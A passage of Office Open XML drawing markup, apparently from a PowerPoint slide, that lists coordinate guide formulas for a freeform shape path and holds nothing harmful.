              <a:gd name="connsiteX119" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 229796 w 1349253"/>
